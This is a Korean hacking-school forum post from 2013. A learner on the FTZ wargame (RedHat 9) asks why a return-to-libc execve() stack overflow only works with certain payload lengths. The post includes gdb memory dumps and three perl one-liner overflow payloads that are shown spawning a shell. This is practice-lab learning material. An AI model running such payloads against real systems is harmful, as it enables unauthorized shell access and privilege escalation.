시스템 해킹

1576,

1/79

kumi123

execve() 함수에 대해 궁금한 것이 있습니다..

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1703 [복사]

규칙을 모르겠습니다.

실행환경은 redhat9.0 이구요.

execve(실행인자, 포인터, NULL) 인것은 아는데..

0x 08 04 90 14 에 심볼릭링크를 건다음, 쉘따는 중인데.

도대체 작동원리를 모르겠어요 ㅠㅠ

0xbffffaa0  41 41 41 41 41 41 41 41 41 41 41 41 ff c3 0c 40   AAAAAAAAAAAA...@
0xbffffab0  ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40   ...@...@...@...@
0xbffffac0  ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 41 41 41 41   ...@...@...@AAAA
0xbffffad0  14 90 04 08 00 00 00 00 f4 fa ff bf e8 85 04 08
sh-2.05b$ exit
[level1@ftz tmp]$ a `perl -e 'print "A"x44, "\xff\xc3\x0c\x40"x8, "AAAA", "\x14\x90\x04\x08"'`

여기서 한번 따진거보면, 두번쨰 인자 없이 바로 널이 와도 되는구나.. 라고 생각햇는데.

0xbffffa90  41 41 41 41 41 41 41 41 41 41 41 41 ff c3 0c 40   AAAAAAAAAAAA...@
0xbffffaa0  ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40   ...@...@...@...@
0xbffffab0  ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40   ...@...@...@...@
0xbffffac0  ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40   ...@...@...@...@
0xbffffad0  41 41 41 41 14 90 04 08 00 fa ff bf 00 00 00 00   AAAA............
0xbffffae0  02 00 00 00 d9 fb ff bf                           ........
sh-2.05b$ exit
[level1@ftz tmp]$ a `perl -e 'print "A"x44, "\xff\xc3\x0c\x40"x13, "AAAA", "\x14\x90\x04\x08"'`

여기보면, 2번째 인자 있어야 작동되고 ㅡ

0xbffffa80  41 41 41 41 41 41 41 41 41 41 41 41 ff c3 0c 40   AAAAAAAAAAAA...@
0xbffffa90  ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40   ...@...@...@...@
0xbffffaa0  ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40   ...@...@...@...@
0xbffffab0  ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40   ...@...@...@...@
0xbffffac0  ff c3 0c 40 ff c3 0c 40 ff c3 0c 40 ff c3 0c 40   ...@...@...@...@
0xbffffad0  41 41 41 41 14 90 04 08 00 fb ff bf 00 00 00 00   AAAA............
sh-2.05b$ exit
[level1@ftz tmp]$ a `perl -e 'print "A"x44, "\xff\xc3\x0c\x40"x17, "AAAA", "\x14\x90\x04\x08"'`

위에도 2번째 인자 있어야 되고,

도대체 원리를 알수가 없네요..

3일째 붙잡고 있습니다.. 좀 도와주세요 ㅠㅠ

Hit : 4045 Date : 2013/08/08 05:38